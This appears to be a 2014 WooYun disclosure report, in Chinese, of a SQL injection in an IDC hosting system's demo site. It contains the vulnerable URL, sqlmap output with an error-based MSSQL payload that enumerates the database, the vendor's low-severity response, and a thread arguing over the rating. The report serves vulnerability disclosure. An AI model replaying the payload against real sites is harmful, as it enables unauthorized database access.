当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061814

漏洞标题:某IDC系统一处sql注入(演示站点中招)

相关厂商:idcsystem.net

漏洞作者: Mosuan

提交时间:2014-05-27 19:21

修复时间:2014-07-11 19:22

公开时间:2014-07-11 19:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-27: 细节已通知厂商并且等待厂商处理中
2014-05-29: 厂商已经确认,细节仅向厂商公开
2014-06-08: 细节向核心白帽子及相关领域专家公开
2014-06-18: 细节向普通白帽子公开
2014-06-28: 细节向实习白帽子公开
2014-07-11: 细节向公众公开

简要描述:

呵呵

详细说明:

不知道是否通杀,既然是演示站点,我想应该通杀的吧..

http://demo.idcsystem.net/server.html?pg=0


注入地址:http://demo.idcsystem.net/server.html?pg=0
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 00:33:08
[00:33:08] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\demo.idcsystem.net\session' as session file
[00:33:08] [INFO] resuming back-end DBMS 'microsoft sql server 2008' from sessio
n file
[00:33:08] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: pg
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: pg=0 AND 3599=CONVERT(INT,(CHAR(58)+CHAR(103)+CHAR(97)+CHAR(122)+CH
AR(58)+(SELECT (CASE WHEN (3599=3599) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)
+CHAR(109)+CHAR(103)+CHAR(108)+CHAR(58)))
---
[00:33:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[00:33:09] [INFO] fetching database names
[00:33:09] [WARNING] the SQL query provided does not return any output
[00:33:09] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a hidden switch '--no-cast' (fixing problems with some collation issue
s) and/or switch '--hex'
[00:33:09] [INFO] falling back to current database
[00:33:09] [INFO] fetching current database
[00:33:09] [INFO] resumed: IXsystem
available databases [1]:
[*] IXsystem

漏洞证明:

11.png

修复方案:

你们懂的!

版权声明:转载请注明来源 Mosuan@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-05-29 09:25

厂商回复:

制作该演示主题模板标签时参数类型设置不正确。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-05-26 19:09 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    洞主请补充至少五个互联网实例啊,先给你按照普通互联网漏洞报告了。

  2. 2014-05-26 22:15 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @疯狗 刚刚看了一下,貌似不是通杀的!

  3. 2014-05-26 22:30 | 云谷科技(CloudGoing Inc.)(乌云厂商)

    @Mosuan 非常感谢您的提交!我们检测到是该系统风格主题的模板标签参数设置不严格导致的,默认使用此风格的站点可能会受影响,我们正在进一步检测其它相类似的问题。再次感谢!

  4. 2014-05-26 22:52 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @云谷科技(CloudGoing Inc.) 有礼物吗亲?

  5. 2014-05-26 22:53 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @云谷科技(CloudGoing Inc.) 但是您请确认漏洞啊,求rank

  6. 2014-05-27 16:25 | 云谷科技(CloudGoing Inc.)(乌云厂商)

    @Mosuan 我们在@wooyun沟通帮我们调整厂商,要不然我们这个帐号没权限确认这个问题。

  7. 2014-05-27 17:45 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @云谷科技(CloudGoing Inc.) ok,@疯狗 @xsser 速来解决吧

  8. 2014-05-27 19:14 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @云谷科技(CloudGoing Inc.) 咱们厂商一共注册了几个帐号,我怎么发现至少有3个呢。。。

  9. 2014-05-27 19:22 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @Mosuan @云谷科技(CloudGoing Inc.) 漏洞已经划分到你的企业帐号下了,可以进行确认操作了

  10. 2014-05-27 19:24 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @云谷科技(CloudGoing Inc.) 求rank,求礼物啊,你懂的1……

  11. 2014-05-27 21:03 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)

    @Mosuan 你关注的逗B 又提交了5个洞子 请查看 我说 你这些天 累吗 要不要我送瓶 老干妈???????????????最后说一句 求详情 求带 求组队。

  12. 2014-05-27 21:23 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @Lonely 早就提交了,只是刚审核出来的

  13. 2014-05-27 21:59 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)

    @Mosuan 带我刷 新浪好不好 一人一个慢慢刷 好不好嘛 我要刷点分 买几本书、 求指导 教育下。

  14. 2014-05-27 22:59 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @Lonely 买书上淘宝买,比wooyun便宜,想买书就挖通用的

  15. 2014-05-29 09:52 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @云谷科技(CloudGoing Inc.) 不管是由于什么模板的问题,你给1rank?我最烦你们这种厂商,碰到漏洞还一味的逃避,下回我在提交你们的漏洞,我就不叫Mosuan,哥这个月的rank就是被你们几个逗比拖下去的

  16. 2014-05-29 23:01 | 云谷科技(CloudGoing Inc.)(乌云厂商)

    @Mosuan 我们首次使用wooyun系统,不太清楚rank的级别对你有多重要,我们以为只是对bug的级别进行评级而已,我们也是作了检测后如实评估,如果可以修改的话可以帮你修改高一点。

  17. 2014-05-29 23:05 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @云谷科技(CloudGoing Inc.) bug级别评级的?sql注入算是高为了大哥,算了算了,不知者无罪

  18. 2014-05-29 23:05 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @云谷科技(CloudGoing Inc.) sql是高危漏洞

  19. 2014-06-10 21:35 | xcc ( 路人 | Rank:0 漏洞数:1 | 我只是个卖包的)

    漏洞Rank:1